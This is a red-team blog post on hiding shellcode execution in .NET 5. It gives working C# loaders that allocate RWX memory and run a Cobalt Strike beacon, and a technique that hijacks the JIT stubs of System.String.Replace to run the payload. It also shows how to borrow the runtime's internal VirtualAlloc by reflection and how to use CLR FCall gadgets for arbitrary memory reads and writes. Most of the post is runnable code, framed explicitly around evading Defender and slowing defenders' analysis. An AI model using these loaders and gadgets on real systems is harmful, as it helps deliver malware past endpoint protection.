
Weird Ways to Run Unmanaged Code in .NET

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often, as red teamers, we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

// Flag values for VirtualAlloc, as defined in the Win32 headers
[Flags]
public enum AllocationType : uint
{
    Commit = 0x1000,
    Reserve = 0x2000
}

public enum MemoryProtection : uint
{
    ExecuteReadWrite = 0x40
}

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    // Allocate RWX memory to hold the payload
    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    // Copy the shellcode over and execute it on a new thread
    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine; however, it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

As an example of the obvious indicators that these imported methods yield, if you try to compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you've just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the project's DLL loader for the moment, the underlying transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. Looking at the documentation, Microsoft tells us that this method "Converts an unmanaged function pointer to a delegate". This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within an x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + nameAddr);
        if (m == name)
        {
            // Map the name index to an ordinal, then use that to look up the function RVA
            var ordinal = Marshal.ReadInt16(baseAddr + (int)exportHeader.AddressOfNameOrdinals + (i * 2));
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (ordinal * 4));
            return baseAddr + exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc(testObject);
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We'll start with the pointer output by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 8 bytes when running within an x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it's worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I've discussed in previous posts, the JIT process is "lazy" in that a method won't be JIT'ed up front (with some exceptions which we won't cover here). Instead, compilation is deferred until first use by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well, usually this pointer lives in a slot located within a vector following the MethodTable, which is in turn indexed by the m_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so-called "Local Slot". We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which, now that we understand how execution flows via the JIT process, should be relatively straightforward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require an EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ee.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.
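As a quick, standalone illustration (a minimal sketch, not tied to any of the offsets above), we can confirm this behaviour of TypeHandle.Value directly:

```csharp
using System;

class TypeHandleDemo
{
    // TypeHandle.Value hands us the MethodTable* for a type directly,
    // saving us from scanning process memory for it
    public static IntPtr GetMethodTable(Type t) => t.TypeHandle.Value;

    static void Main()
    {
        IntPtr mt = GetMethodTable(typeof(string));
        Console.WriteLine("System.String MethodTable: 0x{0:X}", mt.ToInt64());

        // Every instance of a type resolves to the same MethodTable
        Console.WriteLine("Shared: {0}", mt == "hello".GetType().TypeHandle.Value);
    }
}
```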

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// The first MethodDesc follows the MethodDescChunk header (0x18 bytes);
// its local slot (TempEntry) sits at offset 0x8 within the MethodDesc
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
IntPtr mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, mem, shellcode.Length);

// Overwrite the local slot with a pointer to our unmanaged code
Marshal.WriteIntPtr(ee.m_pChunks + 0x18 + 0x8, mem);

// Now we invoke our unmanaged code by calling the not-yet-JIT'ed method
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);

Put together we get code like this:

Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call that we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes smarty pants! This was a P/Invoke, however in keeping with our exploration of weird ways to run unmanaged code, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });

Now unfortunately the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. This normally requires an unsafe context to play around with, which for the purposes of this post I’m trying to avoid. So let’s try to convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

And when executed, we get a nice beacon:

Now this is nice, but what if we want to run unmanaged code and then resume executing further .NET code afterwards? Well, we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. If we take a memory dump of the String.Replace MethodDesc before it has been JIT’d:

And then we look again after, we will see an address being populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled method’s native code once the JIT process has completed. Now this field is not guaranteed to be present, and we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:
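We can perform this check from managed code too, reusing the structure walk from earlier. Note that the flag value below is an assumption lifted from CoreCLR's method.hpp for the build examined here, and should be verified against the runtime in use:

```csharp
// Assumed value of mdcHasNativeCodeSlot, taken from CoreCLR's method.hpp
const ushort mdcHasNativeCodeSlot = 0x0020;

// Reusing the EEClass walk from earlier to grab the first MethodDesc
var md = Marshal.PtrToStructure<MethodDesc>(ee.m_pChunks + 0x18);
bool hasNativeCodeSlot = (md.m_wFlags & mdcHasNativeCodeSlot) != 0;
Console.WriteLine("Native Code Slot present: {0}", hasNativeCodeSlot);
```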

If this flag is present, we can simply force JIT compilation and then update the Native Code Slot, pointing it at our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once our payload has executed, we can then restore the pointer to the actual JIT’d native code to ensure that the original .NET code runs as normal. The code to do this looks like this:
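Reusing the structures and offsets from earlier, a condensed sketch of this hijack might look like the following. The position of the Native Code Slot (directly after the local slot) is an assumption for the .NET 5 x64 build examined here, and shellcodeAddr stands in for memory allocated and populated as shown previously:

```csharp
// Sketch only -- offsets are specific to the .NET 5 x64 runtime examined here
var mt = Marshal.PtrToStructure<MethodTable>(typeof(System.String).TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);

// Force String.Replace through the JIT so the Native Code Slot is populated
"JITME".Replace("J", "X", true, null);

// Assumed layout: chunk header (0x18) + MethodDesc (0x8) + local slot (0x8)
IntPtr nativeCodeSlot = ee.m_pChunks + 0x18 + 0x10;
IntPtr originalNativeCode = Marshal.ReadIntPtr(nativeCodeSlot);

// Point the slot at our unmanaged payload (shellcodeAddr is a placeholder)
Marshal.WriteIntPtr(nativeCodeSlot, shellcodeAddr);

// Trigger the payload via the hijacked .NET method...
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);

// ...then restore the original pointer so .NET execution resumes as normal
Marshal.WriteIntPtr(nativeCodeSlot, originalNativeCode);
```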

And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:

So, what else can we find in the .NET runtime, are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code which transfers execution into the CLR. Inside the CLR they are referred to as an “FCall” and “QCall” respectively. The reasons that these calls exist are varied, but essentially when the .NET framework can’t do something from within managed code, an FCall or QCall is used to request that native code perform the function before returning back to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetFunctionPointerForDelegateInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition from .NET disassembly into reviewing the source for the CLR would certainly slow down static analysis… hopefully increasing that WTF!! factor along the way. Let’s start by hunting for a set of memory read and write gadgets which, as we now know from above, will lead to code execution.
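To get a feel for the size of the hunting ground, we can enumerate FCall candidates from managed code itself by searching System.Private.CoreLib for methods carrying the InternalCall implementation flag. A minimal sketch (the exact set of methods returned will vary between runtime versions):

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;

class FCallHunter
{
    // Every method in System.Private.CoreLib marked InternalCall transitions
    // straight into native CLR code when invoked
    public static List<MethodBase> FindFCalls()
    {
        return typeof(string).Assembly.GetTypes()
            .SelectMany(t => t.GetMethods(BindingFlags.Public | BindingFlags.NonPublic |
                                          BindingFlags.Static | BindingFlags.Instance |
                                          BindingFlags.DeclaredOnly))
            .Where(m => (m.GetMethodImplementationFlags() &
                         MethodImplAttributes.InternalCall) != 0)
            .Cast<MethodBase>()
            .ToList();
    }

    static void Main()
    {
        var fcalls = FindFCalls();
        Console.WriteLine("Found {0} FCall candidates, e.g.:", fcalls.Count);
        foreach (var m in fcalls.Take(5))
            Console.WriteLine("  {0}.{1}", m.DeclaringType.FullName, m.Name);
    }
}
```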

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK, so this looks good: here we have an IntPtr being passed from managed to unmanaged code, without any kind of validation that the pointer we are passing is in fact an NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A review shows us that we can use this to return arbitrary memory of IntPtr.Size bytes in length. How can we do this? Well let’s return to .NET and try the following code:
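In rough terms, the read gadget can be driven via reflection like this. The offset of m_pNDirectTarget within NDirectMethodDesc is an assumption here (0x30 is illustrative) and must be pulled from the CoreCLR source for the exact build in use:

```csharp
using System;
using System.Reflection;

class ReadGadget
{
    // Assumed offset of ndirect.m_pNDirectTarget within NDirectMethodDesc;
    // verify against the CLR source for the target runtime build
    const int NDirectTargetOffset = 0x30;

    static readonly MethodInfo getNDirectTarget = typeof(string).Assembly
        .GetType("System.StubHelpers.StubHelpers")
        .GetMethod("GetNDirectTarget", BindingFlags.NonPublic | BindingFlags.Static);

    // GetNDirectTarget(pNMD) returns *(pNMD + offset) with no validation of
    // pNMD, handing us an arbitrary IntPtr.Size byte read primitive
    public static IntPtr ReadPtr(IntPtr address)
    {
        return (IntPtr)getNDirectTarget.Invoke(
            null, new object[] { address - NDirectTargetOffset });
    }

    static void Main()
    {
        // For example, read the first pointer-sized field of String's MethodTable
        IntPtr mt = typeof(string).TypeHandle.Value;
        Console.WriteLine("0x{0:X}", ReadPtr(mt).ToInt64());
    }
}
```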

And if we run this:

Awesome, so we have our first example of a gadget which can be useful to interact with unmanaged memory. Next, we should think about how to write memory. Again if we review potential FCalls and QCalls it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngdRefCustomMarshaler, we find that m_pCMHelper is the only member variable present in the class:

So, this one is easy, we can write 8 bytes to any memory location as we control both pThis and pCMHelper. The code to do this looks something like this:
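A sketch of that write primitive, driven via reflection (since m_pCMHelper sits at offset zero within the class, pThis itself becomes the write target):

```csharp
using System;
using System.Reflection;

class WriteGadget
{
    static readonly MethodInfo createMarshaler = typeof(string).Assembly
        .GetType("System.StubHelpers.MngdRefCustomMarshaler")
        .GetMethod("CreateMarshaler", BindingFlags.NonPublic | BindingFlags.Static);

    // CreateMarshaler(pThis, pCMHelper) performs pThis->m_pCMHelper = pCMHelper;
    // with m_pCMHelper at offset zero this writes `value` to `address` (8 bytes on x64)
    public static void WritePtr(IntPtr address, IntPtr value)
    {
        createMarshaler.Invoke(null, new object[] { address, value });
    }
}
```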

Let’s have some fun and use this gadget to modify the length of a System.String object to show the control we have to modify arbitrary memory bytes:

OK, so now we have our 2 (of MANY possible) gadgets, what would it look like if we transplanted them into our code execution example? Well, we end up with something pretty weird:

And of course, if we execute this, we end up with our desired result of unmanaged code execution:

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!